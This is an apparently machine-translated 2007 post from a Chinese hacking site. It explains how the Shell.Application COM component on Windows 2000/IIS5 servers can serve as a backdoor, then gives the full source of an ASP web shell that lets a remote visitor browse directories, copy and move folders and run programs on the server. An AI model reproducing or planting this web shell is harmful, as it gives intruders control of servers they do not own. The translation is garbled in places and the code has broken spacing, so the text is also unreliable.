To the shell. the application object of the vulnerability description-vulnerability warning-the black bar safety net

ID MYHACK58:62200717438
Type myhack58
Reporter 佚名
Modified 2007-10-30T00:00:00


Environment: in 2kserver+iis5 successfully, the permissions default iis permissions: scripts executable Description: in the 2K server on the default you can use the server. the createobject method to Use the already installed components such as everyone knows the ADO database controls,but in addition to These specialized components provided by outside as well as some originally provided to the system using components such as WSH,FSO they can also use the above approach to use, of course now most of the asp back door using them, so the existing network to delete or change the registry in both A component's CLSID Value to disable them, of course, also some in the"Control Panel""add delete In addition to the program"put them directly uninstalled. But now I use shell. the application component is already considered safe The server component(or some people simply don't know it), in MSDN through the shell object can find it. This Assembly and WSH,FSO does not matter. Through it we can do? We can browse the directory, the directory to copy Tony, move and get file size, you can also perform existing program(bat,exe,hta) However, you cannot add parameters. The implementation of these we want to what are the permissions: 1. We want to be able to upload ASP files to the scripts executable directory 2. On the server hard disk permissions if the default of everyone full control 3. This component has not been removed(fee) Below is my write examples of just calling it a shell backdoor it, I think not counting vulnerabilities is also To calculate a new back door.

<%response. write "<font size=6 color=red>can only execute one operation:)</font>" %> <%response. write now()%><BR>the procedure where the physical path: <%response. the write request. servervariables("APPL_PHYSICAL_PATH")%> <html> <title>czy's shell. application backdoor </title> <body> <form action="<%= Request. ServerVariables("URL") %>" method="POST"> <input type=text name=text value="<%= szCMD %>"> Enter to browse the directory<br> <input type=text name=text1 value="<%= szCMD1 %>"> copy <input type=text name=text2 value="<%= szCMD2 %>"><br> <input type=text name=text3 value="<%= szCMD3 %>"> the move <input type=text name=text4 value="<%= szCMD4 %>"><br> Path:<input type=text name=text5 value="<%= szCMD5 %>"> Program:<input type=text name=text6 value="<%= szCMD6 %>"><br> <input type=submit name=sb value=Send command> </form> </body> </html> <% szCMD = Request. Form("text") 'directory browsing if (szCMD <> "") then set shell=server. createobject("shell. application") 'build the shell object set fod1=shell. namespace(szcmd) set foditems=fod1. items for each co in foditems response. write "<font color=red>" & amp; co. path &"-----" & amp; co. the size & "</font><br>" next end if %>

<% szCMD1 = Request. Form("text1") 'directory copy, not file copy szCMD2 = Request. Form("text2") if szcmd1<>"" and szcmd2<>"" then set shell1=server. createobject("shell. application") 'build the shell object set fod1=shell1. namespace(szcmd2)

for i=len(szcmd1) to 1 step -1 if mid(szcmd1,i,1)="\" then path=left(szcmd1,i-1) exit for end if next

if len(path)=2 then path=path & "\" path2=right(szcmd1,len(szcmd1)-i) set fod2=shell1. namespace(path) set foditem=fod2. parsename(path2) fod1. copyhere foditem response. write "command completed success!" end if %>

<% szCMD3 = Request. Form("text3") 'the directory move szCMD4 = Request. Form("text4") if szcmd3<>"" and szcmd4<>"" then set shell2=server. createobject("shell. application") 'build the shell object set fod1=shell2. namespace(szcmd4)

for i=len(szcmd3) to 1 step -1 if mid(szcmd3,i,1)="\" then path=left(szcmd3,i-1) exit for end if next

if len(path)=2 then path=path & "\" path2=right(szcmd3,len(szcmd3)-i) set fod2=shell2. namespace(path) set foditem=fod2. parsename(path2) fod1. movehere foditem response. write "command completed success!" end if %> <% szCMD5 = Request. Form("text5") 'execute the program to the specified path szCMD6 = Request. Form("text6") if szcmd5<>"" and szcmd6<>"" then set shell3=server. createobject("shell. application") 'build the shell object shell3. namespace(szcmd5). items. item(szcmd6). invokeverb response. write "command completed success!" end if